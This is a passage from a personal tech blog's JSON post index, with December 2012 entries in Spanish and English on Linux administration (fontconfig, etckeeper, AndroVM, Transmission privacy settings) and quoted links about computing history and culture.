for a second and think about it, Linux\nis probably the only OS that has a unified code base. For example,\nMicrosoft and Apple use different kernels for their desktop and mobile\nOS versions (Windows NT/Windows CE and OS X/iOS). Two of the reasons\nthis is possible on Linux are that the kernel has many abstraction\nlayers and levels of indirection and because its build system allows\nfor creating highly customized kernel binary images.\u003c/p\u003e","title":"Kbuild: the Linux Kernel Build System"},{"content":" Since the dawn of recorded history, we’ve been using visual depictions to map the Earth, order the heavens, make sense of time, dissect the human body, organize the natural world, perform music, and even concretize abstract concepts like consciousness and love. 100 Diagrams That Changed the World (UK; public library) by investigative journalist and documentarian Scott Christianson chronicles the history of our evolving understanding of the world through humanity’s most groundbreaking sketches, illustrations, and drawings, ranging from cave paintings to The Rosetta Stone to Moses Harris’s color wheel to Tim Berners-Lee’s flowchart for a ”mesh” information management system, the original blueprint for the world wide web.\n» Maria Popova | brainpickings.org\n","permalink":"http://karpoke.ignaciocano.com/2012/12/30/100-diagrams-that-changed-the-world/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSince the dawn of recorded history, we’ve been using visual depictions\nto map the Earth, order the heavens, make sense of time, dissect the\nhuman body, organize the natural world, perform music, and even\nconcretize abstract concepts like consciousness and love. 100 Diagrams\nThat Changed the World (UK; public library) by investigative\njournalist and documentarian Scott Christianson chronicles the history\nof our evolving understanding of the world through humanity’s most\ngroundbreaking sketches, illustrations, and drawings, ranging from\ncave paintings to The Rosetta Stone to Moses Harris’s color wheel to\nTim Berners-Lee’s flowchart for a ”mesh” information management\nsystem, the original blueprint for the world wide web.\u003c/p\u003e","title":"100 Diagrams That Changed the World"},{"content":"En Ubuntu, si tenemos el archivo de configuración ~./fonts.conf y lanzamos una aplicación que lo utilice, es posible que nos aparezca un error como el siguiente:\nFontconfig warning: \u0026#34;/etc/fonts/conf.d/50-user.conf\u0026#34;, line 9: reading configurations from ~/.fonts.conf is deprecated. El motivo, tal como apunta Githlar en este foro, es que ~/.fonts.conf será eliminado en el futuro. La solución pasa por mover el fichero a su nuevo emplazamiento (es posible que necesitemos primero crear el directorio destino):\n$ mkdir -p .config/fontconfig $ mv -i ~/.fonts.conf ~/.config/fontconfig/fonts.conf Referencias » Fontconfig warning » better ~/.fonts.conf deprecation warning\n","permalink":"http://karpoke.ignaciocano.com/2012/12/23/solucionado-el-error-fontconfig-warning-reading-configurations-from-fonts-conf-is-deprecated-en-ubuntu/","summary":"\u003cp\u003eEn Ubuntu, si tenemos el archivo de configuración \u003ccode\u003e~./fonts.conf\u003c/code\u003e y\nlanzamos una aplicación que lo utilice, es posible que nos aparezca un\nerror como el siguiente:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eFontconfig warning: \u0026#34;/etc/fonts/conf.d/50-user.conf\u0026#34;, line 9: reading configurations from ~/.fonts.conf is deprecated.\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEl motivo, \u003ca href=\"http://askubuntu.com/questions/206271/fontconfig-warning\"\u003etal como apunta Githlar en este foro\u003c/a\u003e, es que\n\u003ccode\u003e~/.fonts.conf\u003c/code\u003e será eliminado en el futuro. La solución pasa por mover\nel fichero a su nuevo emplazamiento (es posible que necesitemos primero\ncrear el directorio destino):\u003c/p\u003e","title":"Solucionado el error \"Fontconfig warning: reading configurations from ~/.fonts.conf is deprecated.\" en Ubuntu"},{"content":"etckeeper permite utilizar una herramienta de control de versiones para registrar los cambios hechos en los ficheros del directorio /etc. Se pueden utilizar varias herramientas de control de versiones, como Bazaar, Git, Mercurial o Darcs.\nAunque puede ser de gran ayuda tener un historial de los cambios en los ficheros del directorio /etc, no debemos olvidar que puede que se estén copiando ficheros que deberían permanecer secretos, como por ejemplo /etc/shadow. Al repositorio sólo puede acceder el administrador del sistema, pero deberemos tener en cuenta esto si, por ejemplo, copiamos el repositorio.\nInstalación En este caso, utilizaremos Bazaar. Instalamos los paquetes necesarios:\n$ sudo aptitude install etckeeper bzr Configuración Editamos el fichero /etc/etckeeper/etckeeper.conf y comprobamos que la siguiente línea no está comentada:\nVCS=\u0026#34;bzr\u0026#34; Si utilizamos aptitude, también podemos modificar el valor de HIGHLEVEL_PACKAGE_MANAGER:\nHIGHLEVEL_PACKAGE_MANAGER=aptitude Inicialización Lo primero que hay que hacer antes que nada es inicializar el repositorio. Ejecutamos:\n$ sudo etckeeper init Del mismo modo, podemos dejar de usar el control de versiones y borrar toda la información guardada ejecutando:\n$ sudo etckeeper uninit Uso Supongamos que acabamos de actualizar el fichero /etc/hosts. Para comprobar los archivos modificados ejecutamos:\n$ sudo bzr status /etc modified: hosts unknown: X11/core Para registrar (commit) los cambios ejecutamos:\n$ sudo etckeeper commit \u0026#34;Updated hphosts\u0026#34; Committing to: /etc/ modificado hosts Committed revision 2. Comprobar el historial de cambios, podemos especiar un directorio o un fichero concreto:\n$ sudo bzr log /etc/hosts ------------------------------------------------------------ revno: 2 committer: karpoke branch nick: localhost /etc repository timestamp: Fri 2012-12-21 15:28:08 +0100 message: Updated hphosts ------------------------------------------------------------ revno: 1 committer: karpoke branch nick: localhost /etc repository timestamp: Fri 2012-12-21 15:13:09 +0100 message: Initial commit Si queremos revertir los cambios, debemos especificar el número de versión al que queremos volver. También podemos especificar un directorio o un fichero:\n$ sudo bzr revert --revision 2 /etc/hosts Alertas y mensajes de error etckeeper está configurado por defecto para ejecutarse automáticamente una vez al día y tras cada actualización, instalación o borrado de paquetes del sistema. En este caso, es posible que, si no hay ningún cambio en los ficheros de /etc, nos aparezca un mensaje de error como el siguiente:\nbzr: ERROR: No changes to commit. Please \u0026#39;bzr add\u0026#39; the files you want to commit, or use --unchanged to force an empty commit. Si queremos evitarlo, basta editar la siguiente línea en el fichero de configuración:\nBZR_COMMIT_OPTIONS=\u0026#34;--unchanged\u0026#34; Avisos de rkhunter Si tenemos instalado rkhunter, podemos añadir las siguientes líneas al fichero de configuración para evitar que nos lleguen avisos de los ficheros y directorios utilizados por etckeeper:\nALLOWHIDDENDIR=\u0026#34;/etc/.bzr\u0026#34; ALLOWHIDDENFILE=\u0026#34;/etc/.etckeeper\u0026#34; ALLOWHIDDENFILE=\u0026#34;/etc/.bzrignore\u0026#34; Referencias » Using Version Control For Your /etc Directory With etckeeper And Bazaar On Debian Squeeze\n","permalink":"http://karpoke.ignaciocano.com/2012/12/21/etckeeper-control-de-versiones-del-directorio-etc/","summary":"\u003cp\u003e\u003ccode\u003eetckeeper\u003c/code\u003e permite utilizar una herramienta de control de versiones\npara registrar los cambios hechos en los ficheros del directorio \u003ccode\u003e/etc\u003c/code\u003e.\nSe pueden utilizar varias herramientas de control de versiones, como\nBazaar, Git, Mercurial o Darcs.\u003c/p\u003e\n\u003cp\u003eAunque puede ser de gran ayuda tener un historial de los cambios en los\nficheros del directorio \u003ccode\u003e/etc\u003c/code\u003e, no debemos olvidar que puede que se\nestén copiando ficheros que deberían permanecer secretos, como por\nejemplo \u003ccode\u003e/etc/shadow\u003c/code\u003e. Al repositorio sólo puede acceder el\nadministrador del sistema, pero deberemos tener en cuenta esto si, por\nejemplo, copiamos el repositorio.\u003c/p\u003e","title":"etckeeper, control de versiones del directorio /etc"},{"content":"Si utilizamos Transmission para descargar torrents podemos activar dos características interesantes: cifrado de la conexión y uso de listas de bloqueo de IPs.\nVamos al menú Editar \u0026gt; Preferencias \u0026gt; Privacidad:\nLista de bloqueos - Activar lista de bloqueo: \u0026lt;http://list.iblocklist.com/?list=bt_level1\u0026amp;fileformat=p2p\u0026amp;archiveformat=gz\u0026gt; - Activar actualizaciones automáticas Privacidad - Modo de cifrado: Requerir cifrado - Usar PEX para buscar más pares - Usar DHT para buscar más pares - Usar el descubridor de pares locales para buscar más pares Actualizado el 12 de abril de 2015 En las versiones actuales de Transmission, las opciones de PEX y DHT están en la pestaña de Red.\nLas listas de bloqueo se pueden obtener de iblocklist.com. Éste es un servicio que recopila listados de IPs, disponibles en diferentes formatos, y que puede utilizarse con varios programas, incluyendo gestores de descargas, para bloquear dichas direcciones.\nUna de las listas más utilizadas es ésta. Contiene un listado de IPs asociadas a gobiernos, compañías u organizaciones en contra de la compartición de archivos y de las redes P2P.\nPor otro lado, DHT se utiliza para encontrar direcciones IP de las que descargar los mismos archivos sin comunicárselo al rastreador central. Asímismo, PEX también se utiliza para encontrar direcciones IP consultando a direcciones IP a las que ya estemos conectados.\nReferencias » [¿El futuro de BitTorrent? DHT, PEX y Enlaces Magnéticos explicados.][]\n[¿El futuro de BitTorrent? DHT, PEX y Enlaces Magnéticos explicados.]:\nhttp://www.bittorrentyp2p.com/%C2%BFel-futuro-de-bittorrent-dht-pex-y-enlaces-magneticos-explicados ","permalink":"http://karpoke.ignaciocano.com/2012/12/19/descargando-torrents-en-modo-paranoico-con-transmission/","summary":"\u003cp\u003eSi utilizamos Transmission para descargar \u003cem\u003etorrents\u003c/em\u003e podemos activar dos\ncaracterísticas interesantes: cifrado de la conexión y uso de listas de\nbloqueo de IPs.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Preferencias del Transmission\" loading=\"lazy\" src=\"/images/preferencias-transmission-300x173.png\"\u003e\u003c/p\u003e\n\u003cp\u003eVamos al menú Editar \u0026gt; Preferencias \u0026gt; Privacidad:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eLista de bloqueos\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e-   Activar lista de bloqueo:\n    \u0026lt;http://list.iblocklist.com/?list=bt_level1\u0026amp;fileformat=p2p\u0026amp;archiveformat=gz\u0026gt;\n-   Activar actualizaciones automáticas\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003ePrivacidad\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e-   Modo de cifrado: Requerir cifrado\n-   Usar PEX para buscar más pares\n-   Usar DHT para buscar más pares\n-   Usar el descubridor de pares locales para buscar más pares\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch4 id=\"actualizado-el-12-de-abril-de-2015\"\u003eActualizado el 12 de abril de 2015\u003c/h4\u003e\n\u003cp\u003eEn las versiones actuales de Transmission, las opciones de PEX y DHT\nestán en la pestaña de Red.\u003c/p\u003e","title":"Descargando torrents en modo paranoico con Transmission"},{"content":" No. Just the fact that you modified or changed the software of your device, is not a sufficient reason to void your statutory warranty. As long as you have bought the device as a consumer in the European Union.\n» Matija Å uklje, Carlo Piana | fsfe.org | Ismael Callejas elandroidelibre.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/19/does-rooting-your-device-void-your-statutory-warranty/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNo.\nJust the fact that you modified or changed the software of your\ndevice, is not a sufficient reason to void your statutory warranty. As\nlong as you have bought the device as a consumer in the European\nUnion.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Matija Å uklje, Carlo Piana | \u003ca href=\"http://fsfe.org/freesoftware/legal/flashingdevices.en.html\"\u003efsfe.org\u003c/a\u003e | Ismael Callejas\n\u003ca href=\"http://www.elandroidelibre.com/2012/11/no-pierdes-la-garantia-por-rootear-y-flasehar-tu-movil-en-europa.html\"\u003eelandroidelibre.com\u003c/a\u003e\u003c/p\u003e","title":"Does rooting your device void your statutory warranty?"},{"content":" Desde que en 1781 apareció la obra ”Año 7603”, primera en la que se habla de un viaje en el tiempo, mucho se ha escrito sobre el tema en la ciencia ficción, sobre posibles paradojas, sobre la posibilidad o no de cambiar los acontecimientos, etcétera. En cada obra, los efectos de dichos viajes se interpretan de forma distinta. Y eso es lo que vamos a ver aquí, 10 interpretaciones en la ciencia ficción sobre lo que puede pasar cuando se conoce el futuro, ya sea conocido por viajes en el tiempo, predicciones u otros medios.\n» zurditorium.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/19/10-interpretaciones-de-los-viajes-en-el-tiempo-y-visiones-del-futuro-en-la-ciencia-ficcion/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDesde que en 1781 apareció la obra ”Año 7603”, primera en la que se\nhabla de un viaje en el tiempo, mucho se ha escrito sobre el tema en\nla ciencia ficción, sobre posibles paradojas, sobre la posibilidad o\nno de cambiar los acontecimientos, etcétera. En cada obra, los efectos\nde dichos viajes se interpretan de forma distinta. Y eso es lo que\nvamos a ver aquí, 10 interpretaciones en la ciencia ficción sobre lo\nque puede pasar cuando se conoce el futuro, ya sea conocido por viajes\nen el tiempo, predicciones u otros medios.\u003c/p\u003e","title":"10 interpretaciones de los viajes en el tiempo y visiones del futuro en la ciencia ficción"},{"content":" En cuanto a la relación de Chomsky con la informática proviene de sus enormes aportaciones a la Teoría de Autómatas y al estudio de los lenguajes formales, donde sus ideas se aplican a la perfección. Dichas aportaciones han resultado elementos indispensables para la construcción de compiladores y traductores que puedan servir de intérpretes válidos entre las órdenes que dan los seres humanos y su correcta recepción y aplicación por máquinas automáticas. Puede decirse que el papel desempeñado por Chomsky ha resultado crucial en este importante campo, pues fue imprescindible para dar el siguiente paso tras los primeros computadores, el ENIAC o el propio ACE de Turing, programados directamente en código binario, de forma que a mediados de 1954 ya influyó en la especificación del borrador The IBM Mathematical Formula Translating System, origen del lenguaje Fortran, y también John Backus adoptó sus reglas para describir la sintaxis de Algol, origen de la notación Backus-Naur.\n» Fernando Cuartero | hablandodeciencia.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/18/noam-chomsky-la-linguistica-la-informatica-y-el-activismo/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn cuanto a la relación de Chomsky con la informática proviene de sus\nenormes aportaciones a la Teoría de Autómatas y al estudio de los\nlenguajes formales, donde sus ideas se aplican a la perfección. Dichas\naportaciones han resultado elementos indispensables para la\nconstrucción de compiladores y traductores que puedan servir de\nintérpretes válidos entre las órdenes que dan los seres humanos y su\ncorrecta recepción y aplicación por máquinas automáticas. Puede\ndecirse que el papel desempeñado por Chomsky ha resultado crucial en\neste importante campo, pues fue imprescindible para dar el siguiente\npaso tras los primeros computadores, el ENIAC o el propio ACE de\nTuring, programados directamente en código binario, de forma que a\nmediados de 1954 ya influyó en la especificación del borrador The IBM\nMathematical Formula Translating System, origen del lenguaje Fortran,\ny también John Backus adoptó sus reglas para describir la sintaxis de\nAlgol, origen de la notación Backus-Naur.\u003c/p\u003e","title":"Noam Chomsky. La lingüistica, la informática y el activismo"},{"content":" This book takes a single line of code”the extremely concise BASIC program for the Commodore 64 inscribed in the title”and uses it as a lens through which to consider the phenomenon of creative computing and the way computer programs exist in culture. The authors of this collaboratively written book treat code not as merely functional but as a text”in the case of 10 PRINT, a text that appeared in many different printed sources”that yields a story about its making, its purpose, its assumptions, and more. They consider randomness and regularity in computing and art, the maze in culture, the popular BASIC programming language, and the highly influential Commodore 64 computer.\n» 10print.org\n","permalink":"http://karpoke.ignaciocano.com/2012/12/18/10-print-chr205-5rnd1-goto-10/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis book takes a single line of code”the extremely concise BASIC\nprogram for the Commodore 64 inscribed in the title”and uses it as a\nlens through which to consider the phenomenon of creative computing\nand the way computer programs exist in culture. The authors of this\ncollaboratively written book treat code not as merely functional but\nas a text”in the case of 10 PRINT, a text that appeared in many\ndifferent printed sources”that yields a story about its making, its\npurpose, its assumptions, and more. They consider randomness and\nregularity in computing and art, the maze in culture, the popular\nBASIC programming language, and the highly influential Commodore 64\ncomputer.\u003c/p\u003e","title":"10 PRINT CHR$(205.5+RND(1)); : GOTO 10"},{"content":" Tor es una red que implementa una técnica llamada Onion Routing (enrutado cebolla en castellano, aunque suena bastante peor), diseñada con vistas a proteger las comunicaciones en la Marina de los Estados Unidos. La ideas es cambiar el modo de enrutado tradicional de Internet para garantizar el anonimato y privacidad de los datos.\n» Guillermo Julián | genbeta.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/18/como-funciona-la-red-tor/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTor es una red que implementa una técnica llamada Onion Routing\n(enrutado cebolla en castellano, aunque suena bastante peor), diseñada\ncon vistas a proteger las comunicaciones en la Marina de los Estados\nUnidos. La ideas es cambiar el modo de enrutado tradicional de\nInternet para garantizar el anonimato y privacidad de los datos.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Guillermo Julián | \u003ca href=\"http://www.genbeta.com/seguridad/como-funciona-la-red-tor\"\u003egenbeta.com\u003c/a\u003e\u003c/p\u003e","title":"¿Cómo funciona la red Tor?"},{"content":" ;`El camino a un mejor programador;’ es un libro que recopila artículos sobre ingeniería informática escritos por Esteban Manchado Velázquez, Joaquín Caraballo Moreno y Yeray Darias Camacho.\nLa mayoría de los artículos tratan sobre pruebas automáticas de una manera u otra, pero el tema común es mejorar como profesional de la informática.\n» emanchado.github.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/17/el-camino-a-un-mejor-programador/","summary":"\u003cblockquote\u003e\n\u003cp\u003e;`El camino a un mejor programador;’ es un libro que recopila\nartículos sobre ingeniería informática escritos por Esteban Manchado\nVelázquez, Joaquín Caraballo Moreno y Yeray Darias Camacho.\u003c/p\u003e\n\u003cp\u003eLa mayoría de los artículos tratan sobre pruebas automáticas de una\nmanera u otra, pero el tema común es mejorar como profesional de la\ninformática.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://emanchado.github.com/camino-mejor-programador/\"\u003eemanchado.github.com\u003c/a\u003e\u003c/p\u003e","title":"El camino a un mejor programador"},{"content":" In this post I present the development model that I’ve introduced for all of my projects (both at work and private) about a year ago, and which has turned out to be very successful. I’ve been meaning to write about it for a while now, but I’ve never really found the time to do so thoroughly, until now. I won’t talk about any of the projects’ details, merely about the branching strategy and release management.\n» nvie | nvie.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/16/a-successful-git-branching-model/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn this post I present the development model that I’ve introduced for\nall of my projects (both at work and private) about a year ago, and\nwhich has turned out to be very successful. I’ve been meaning to write\nabout it for a while now, but I’ve never really found the time to do\nso thoroughly, until now. I won’t talk about any of the projects’\ndetails, merely about the branching strategy and release management.\u003c/p\u003e","title":"A successful Git branching model"},{"content":" If you have the choice, embracing an open approach to development has tremendous benefits. It allows you to build on the work of other scientists, and enables others to build on your own efforts. To make the development of open scientific software more rewarding and the experience of using software more positive, the following ten rules are intended to serve as a guide for any computational scientist.\n» Andreas Prlić1, James B. Procter | ploscompbiol.org\n","permalink":"http://karpoke.ignaciocano.com/2012/12/16/ten-simple-rules-for-the-open-development-of-scientific-software/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIf you have the choice, embracing an open approach to development has\ntremendous benefits. It allows you to build on the work of other\nscientists, and enables others to build on your own efforts. To make\nthe development of open scientific software more rewarding and the\nexperience of using software more positive, the following ten rules\nare intended to serve as a guide for any computational scientist.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Andreas Prlić1, James B. Procter | \u003ca href=\"http://www.ploscompbiol.org/article/info%3Adoi%2F10.1371%2Fjournal.pcbi.1002802\"\u003eploscompbiol.org\u003c/a\u003e\u003c/p\u003e","title":"Ten Simple Rules for the Open Development of Scientific Software"},{"content":" Pull ”Nuke 386-DX/SX support” from Ingo Molnar: ”This tree removes ancient-386-CPUs support and thus zaps quite a bit of complexity:\n24 files changed, 56 insertions(+), 425 deletions(-)\n\u0026hellip; which complexity has plagued us with extra work whenever we wanted to change SMP primitives, for years.\nUnfortunately there’s a nostalgic cost: your old original 386 DX33 system from early 1991 won’t be able to boot modern Linux kernels anymore. Sniff.”\nI’m not sentimental. Good riddance.\n» Linus Torvalds | git.kernel.org\n","permalink":"http://karpoke.ignaciocano.com/2012/12/16/merge-branch-x86-nuke386-for-linus/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePull ”Nuke 386-DX/SX support” from Ingo Molnar: ”This tree removes\nancient-386-CPUs support and thus zaps quite a bit of complexity:\u003c/p\u003e\n\u003cp\u003e24 files changed, 56 insertions(+), 425 deletions(-)\u003c/p\u003e\n\u003cp\u003e\u0026hellip; which complexity has plagued us with extra work whenever we wanted to\nchange SMP primitives, for years.\u003c/p\u003e\n\u003cp\u003eUnfortunately there’s a nostalgic cost: your old original 386 DX33 system\nfrom early 1991 won’t be able to boot modern Linux kernels anymore. Sniff.”\u003c/p\u003e\n\u003cp\u003eI’m not sentimental. Good riddance.\u003c/p\u003e","title":"Merge branch ’x86-nuke386-for-linus’"},{"content":" El 29 de noviembre de 1972, hace ahora 40 años, un extraño artilugio salía del taller de Atari, por aquel entonces una jovencísima empresa que pretendía prácticamente inventar un nuevo mercado, con conceptos y aparatos como los videojuegos, las videoconsolas y las máquinas recreativas de videojuegos.\nSe llamaba Pong y era un enorme armario de madera con un tubo de rayos catódicos en blanco y negro a modo de pantalla, unas palancas a modo de mandos y una ranura en la que echar monedas. Esos fueron los humildes comienzos de una compañía pionera fundada por Nolan Bushnell y Ted Dabney en Estados Unidos el verano de ese mismo año. El juego en sí lo desarrolló Allan Alcorn, un ingeniero cuyo nombre también ha pasado a los anales de la informática y la industria del entretenimiento.\n» Alvy | rtve.es\n","permalink":"http://karpoke.ignaciocano.com/2012/12/16/pong-cumple-40-anos-un-videojuego-tan-antiguo-tan-antiguo-que-ni-siquiera-era-digital/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl 29 de noviembre de 1972, hace ahora 40 años, un extraño artilugio\nsalía del taller de Atari, por aquel entonces una jovencísima empresa\nque pretendía prácticamente inventar un nuevo mercado, con conceptos y\naparatos como los videojuegos, las videoconsolas y las máquinas\nrecreativas de videojuegos.\u003c/p\u003e\n\u003cp\u003eSe llamaba Pong y era un enorme armario de madera con un tubo de rayos\ncatódicos en blanco y negro a modo de pantalla, unas palancas a modo\nde mandos y una ranura en la que echar monedas. Esos fueron los\nhumildes comienzos de una compañía pionera fundada por Nolan Bushnell\ny Ted Dabney en Estados Unidos el verano de ese mismo año. El juego en\nsí lo desarrolló Allan Alcorn, un ingeniero cuyo nombre también ha\npasado a los anales de la informática y la industria del\nentretenimiento.\u003c/p\u003e","title":"Pong cumple 40 años: un videojuego tan antiguo, tan antiguo que ni siquiera era digital"},{"content":" Las clases de ingeniería electrónica suelen dictarse usando herramientas propietarias, así que siempre paso algunas horas buscando hacer mis trabajos con software libre. Por esta razón, he decidido compartir la siguiente guía.\n» pandacris | usemoslinux.blogspot.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/15/como-trabajar-con-vhdl-usando-software-libre/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLas clases de ingeniería electrónica suelen dictarse usando\nherramientas propietarias, así que siempre paso algunas horas buscando\nhacer mis trabajos con software libre. Por esta razón, he decidido\ncompartir la siguiente guía.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» pandacris | \u003ca href=\"http://usemoslinux.blogspot.com/2012/12/como-trabajar-con-vhdl-usando-software.html\"\u003eusemoslinux.blogspot.com\u003c/a\u003e\u003c/p\u003e","title":"Cómo trabajar con vhdl usando software libre"},{"content":"AndroVM es una máquina virtual para ejecutar Android. Si queremos probarla, lo único que tenemos que hacer es descargarla y configurar VirtualBox OSE para ejecutarla.\nDescarga Desde la página de descargas nos descargamos el fichero OVA, por ejemplo, vbox86tp version with gapps \u0026amp; houdini (hay varias versiones, pero ésta es la más completa), y el reproductor para nuestra plataforma, por ejemplo Linux 32-bit, que emplearemos si queremos utilizar la aceleración hardware OpenGL.\n$ wget http://androvm.org/Download/androVM_vbox86tp_4.1.1_r4-20121119-gapps-houdini-flash.ova $ wget http://androvm.org/Download/AndroVMplayer-linux32-20121106.tgz Configuración de VirtualBox OSE Vamos a Archivo \u0026gt; Preferencias \u0026gt; Red y creamos un adaptador de red de tipo \u0026ldquo;Sólo anfitrión\u0026rdquo;. Habilitamos, también, el servidor DHCP.\nImportamos el fichero OVA desde Archivo \u0026gt; Importar servicio virtualizado.\nHabilitamos la interfaz de red de AndroVM, deshabilitada por defecto. Para ello, vamos a las Preferencias de la máquina virtual \u0026gt; Red \u0026gt; Adaptador 1 y lo conectamos a \u0026ldquo;Adaptador sólo anfitrión\u0026rdquo;.\nArranque Iniciamos la máquina virtual y procedemos con la configuración inicial de Android.\nAceleración hardware OpenGL Si queremos activar la aceleración hardware OpenGL, abrimos la aplicación AndroVM Configuration, que ya viene instalada, y marcamos la casilla. Guardamos y reiniciamos cuando nos lo pida.\nEl otro archivo que nos hemos bajado, AndroVMplayer, se utiliza para mostrar la máquina virtual y gestionar sus eventos. Reiniciamos la máquina virtual y mientras tanto, ejecutamos este archivo que puede tomar tres parámetros: ancho, alto y densidad.\n$ tar xvzf AndroVMplayer-linux32-20121106.tgz $ cd AndroVMplayer $ ./AndroVMplayer 1024 600 160 Referencias » androvm.org\n","permalink":"http://karpoke.ignaciocano.com/2012/12/15/jelly-bean-con-androvm-en-virtualbox-ose/","summary":"\u003cp\u003e\u003ca href=\"http://androvm.org/\"\u003eAndroVM\u003c/a\u003e es una máquina virtual para ejecutar Android. Si queremos\nprobarla, lo único que tenemos que hacer es \u003ca href=\"http://androvm.org/blog/download/\"\u003edescargarla\u003c/a\u003e y configurar\nVirtualBox OSE para ejecutarla.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"jelly bean\" loading=\"lazy\" src=\"/images/jelly-bean-300x183.png\"\u003e\u003c/p\u003e\n\u003ch2 id=\"descarga\"\u003eDescarga\u003c/h2\u003e\n\u003cp\u003eDesde la página de \u003ca href=\"http://androvm.org/blog/download/\"\u003edescargas\u003c/a\u003e nos descargamos el fichero\nOVA, por ejemplo, \u003cstrong\u003evbox86tp version with gapps \u0026amp; houdini\u003c/strong\u003e (hay varias\nversiones, pero ésta es la más completa), y el reproductor para nuestra\nplataforma, por ejemplo \u003cstrong\u003eLinux 32-bit\u003c/strong\u003e, que emplearemos si queremos\nutilizar la aceleración hardware OpenGL.\u003c/p\u003e","title":"Jelly Bean con AndroVM en VirtualBox OSE"},{"content":" This project has been an astonishing little journey. Many of my previous projects were characterized by an amazing outpouring of effort to build something highly intricate and ultimately invisible. This is the opposite kind of project. A little bit of work and a little custom design to create something new and exciting that I can immediately use in my everyday life. It also happens to be a sex toy. In other words, I wanted to hack something I actually use: my vagina.\n» Beth | scanlime.org\n","permalink":"http://karpoke.ignaciocano.com/2012/12/15/hacking-my-vagina/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis project has been an astonishing little journey. Many of my\nprevious projects were characterized by an amazing outpouring of\neffort to build something highly intricate and ultimately invisible.\nThis is the opposite kind of project. A little bit of work and a\nlittle custom design to create something new and exciting that I can\nimmediately use in my everyday life. It also happens to be a sex toy.\nIn other words, I wanted to hack something I actually use: my vagina.\u003c/p\u003e","title":"Hacking my vagina"},{"content":" You are about to enter the Big Internet Museum. Explore an interactive and ever-growing collection about the Internet and its remarkable graphic interface: the World Wide Web.\nBy the way, we don’t have a building. The reason is simple: our collection only exists online. Aside from that it’s a museum like any other – with curators, a diverse permanent collection, temporary exhibitions, different wings, donations, and more. In the Big Internet Museum you can have your name printed on the wall by submitting a piece to the collection! We might even open a gift shop. There, we’ve said it.\n» thebiginternetmuseum.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/15/the-big-internet-museum/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYou are about to enter the Big Internet Museum. Explore an interactive\nand ever-growing collection about the Internet and its remarkable\ngraphic interface: the World Wide Web.\u003c/p\u003e\n\u003cp\u003eBy the way, we don’t have a building. The reason is simple: our\ncollection only exists online. Aside from that it’s a museum like any\nother – with curators, a diverse permanent collection, temporary\nexhibitions, different wings, donations, and more. In the Big Internet\nMuseum you can have your name printed on the wall by submitting a\npiece to the collection! We might even open a gift shop. There, we’ve\nsaid it.\u003c/p\u003e","title":"The Big Internet Museum"},{"content":" 2012 has been another year of records for Linux. The operating system is the fastest growing platform across multiple industries and is inspiring new projects every single day. Join us as we review this amazing year and celebrate Linux and its global community of developers, contributors and sponsors. For more information about Linux, please visit linuxfoundation.org and linux.com.\nThird-party Video and Photo Credits In order of appearance:\nTechnology Academy of Finland Amazon (Kindle) Google (Chromebook) » TheLinuxFoundation | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/15/2012-what-a-year-for-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003e2012 has been another year of records for Linux. The operating system is the\nfastest growing platform across multiple industries and is inspiring new\nprojects every single day. Join us as we review this amazing year and\ncelebrate Linux and its global community of developers, contributors and\nsponsors. For more information about Linux, please visit\n\u003ca href=\"http://www.linuxfoundation.org\"\u003elinuxfoundation.org\u003c/a\u003e and \u003ca href=\"http://www.linux.com.\"\u003elinux.com\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eThird-party Video and Photo Credits In order of appearance:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eTechnology Academy of Finland\u003c/li\u003e\n\u003cli\u003eAmazon (Kindle)\u003c/li\u003e\n\u003cli\u003eGoogle (Chromebook)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/Unfx2qCj6Ao?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» 